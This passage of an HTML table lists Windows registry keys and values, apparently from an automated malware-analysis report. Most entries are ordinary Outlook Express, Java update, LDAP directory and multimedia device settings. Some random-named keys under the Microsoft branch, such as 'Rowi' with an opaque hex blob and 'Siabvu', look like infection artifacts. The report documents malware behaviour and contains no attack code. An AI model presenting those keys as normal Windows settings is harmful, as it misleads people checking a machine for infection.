<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Rules\Mail</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Trident</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Trident\Main</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Trident\Settings</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\JavaSoft\Java Runtime Environment</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\JavaSoft\Java Runtime Environment\1.6.0_29</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\JavaSoft\Java Runtime Environment\1.6.0_29</span></td>
<td><span style="color: black; font-size: xx-small;">BalloonShown</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\JavaSoft\Java Update</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">LastUpdateBeginTime</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Sat, 22 Sep 2012 16:30:08 GMT"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">LastUpdateFinishTime</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Sat, 22 Sep 2012 16:30:09 GMT"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">VersionXmlURL</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"http://javadl-esd.sun.com/update/1.6.0/au-descriptor-1.6.0_35-b10.xml"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy\JavaFX</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy\JavaFX</span></td>
<td><span style="color: black; font-size: xx-small;">UpdateSchedule</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000011</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy\JavaFX</span></td>
<td><span style="color: black; font-size: xx-small;">UpdateScheduleMinutes</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:0000001a</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy\JavaFX</span></td>
<td><span style="color: black; font-size: xx-small;">Frequency</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000020</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy\JavaFX</span></td>
<td><span style="color: black; font-size: xx-small;">LastUpdateInvokedTime</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Sat, 22 Sep 2012 16:30:09 GMT"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Direct3D</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Direct3D\MostRecentApplication</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Direct3D\MostRecentApplication</span></td>
<td><span style="color: black; font-size: xx-small;">Name</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"java.exe"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager</span></td>
<td><span style="color: black; font-size: xx-small;">Server ID</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000004</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager</span></td>
<td><span style="color: black; font-size: xx-small;">Default LDAP Account</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Active Directory GC"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts</span></td>
<td><span style="color: black; font-size: xx-small;">PreConfigVer</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000004</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts</span></td>
<td><span style="color: black; font-size: xx-small;">PreConfigVerNTDS</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts</span></td>
<td><span style="color: black; font-size: xx-small;">ConnectionSettingsMigrated</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts</span></td>
<td><span style="color: black; font-size: xx-small;">AssociatedID</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:19,c7,7f,f0,eb,18,71,4b,81,0c,ca,d6,fc,92,08,57,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Server ID</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">Account Name</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Active Directory"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Server</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"NULL"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Search Return</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000064</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Timeout</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:0000003c</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Authentication</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000002</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Simple Search</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Bind DN</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Port</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000cc4</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Resolve Flag</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Secure Connection</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP User Name</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"NULL"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Search Base</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"NULL"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Server ID</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot</span></td>
<td><span style="color: black; font-size: xx-small;">Account Name</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Bigfoot Internet Directory Service"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Server</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"ldap.bigfoot.com"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP URL</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"http://www.bigfoot.com"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Search Return</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000064</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Timeout</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:0000003c</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Authentication</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Simple Search</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Logo</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex(2):25,50,72,6f,67,72,61,6d,46,69,6c,65,73,25,5c,43,6f,6d,6d,6f,6e,20,46,69,6c,65,73,5c,53,65,72,76,69,63,65,73,5c,62,69,67,66,6f,6f,74,2e,62,6d,70,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Server ID</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000002</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td><span style="color: black; font-size: xx-small;">Account Name</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"VeriSign Internet Directory Service"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Server</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"directory.verisign.com"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP URL</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"http://www.verisign.com"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Search Return</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000064</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Timeout</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:0000003c</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Authentication</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Search Base</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"NULL"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Simple Search</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Logo</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex(2):25,50,72,6f,67,72,61,6d,46,69,6c,65,73,25,5c,43,6f,6d,6d,6f,6e,20,46,69,6c,65,73,5c,53,65,72,76,69,63,65,73,5c,76,65,72,69,73,69,67,6e,2e,62,6d,70,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Server ID</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000003</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere</span></td>
<td><span style="color: black; font-size: xx-small;">Account Name</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"WhoWhere Internet Directory Service"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Server</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"ldap.whowhere.com"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP URL</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"http://www.whowhere.com"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Search Return</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000064</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Timeout</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:0000003c</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Authentication</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Simple Search</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Logo</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex(2):25,50,72,6f,67,72,61,6d,46,69,6c,65,73,25,5c,43,6f,6d,6d,6f,6e,20,46,69,6c,65,73,5c,53,65,72,76,69,63,65,73,5c,77,68,6f,77,68,65,72,65,2e,62,6d,70,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Rowi</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Rowi</span></td>
<td><span style="color: black; font-size: xx-small;">Xoywarsu</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,da,81,20,17,73,ab,ee,51,52,94,51,12,67,6e,e8,7a,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,8a,c7,26,4a,74,cb,75,91,2d,a4,34,86,54,16,8b,30,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Siabvu</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\WAB</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4</span></td>
<td><span style="color: black; font-size: xx-small;">OlkContactRefresh</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4</span></td>
<td><span style="color: black; font-size: xx-small;">OlkFolderRefresh</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4</span></td>
<td><span style="color: black; font-size: xx-small;">FirstRun</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4\Wab File Name</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4\Wab File Name</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\bomber\Application Data\Microsoft\Address Book\bomber.wab"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device</span></td>
<td><span style="color: black; font-size: xx-small;">FriendlyName</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Default MidiOut Device"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device</span></td>
<td><span style="color: black; font-size: xx-small;">CLSID</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"{07B65360-C445-11CE-AFDE-00AA006C14F4}"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device</span></td>
<td><span style="color: black; font-size: xx-small;">FilterData</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:02,00,00,00,00,00,80,00,01,00,00,00,00,00,00,00,30,70,69,33,02,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,30,74,79,33,00,00,00,00,38,00,00,00,48,00,00,00,6d,69,64,73,00,00,10,00,80,00,00,aa,00,38,9b,71,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device</span></td>
<td><span style="color: black; font-size: xx-small;">MidiOutId</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:ffffffff</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device</span></td>
<td><span style="color: black; font-size: xx-small;">FriendlyName</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Default DirectSound Device"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device</span></td>
<td><span style="color: black; font-size: xx-small;">CLSID</span></td>
<td></td>
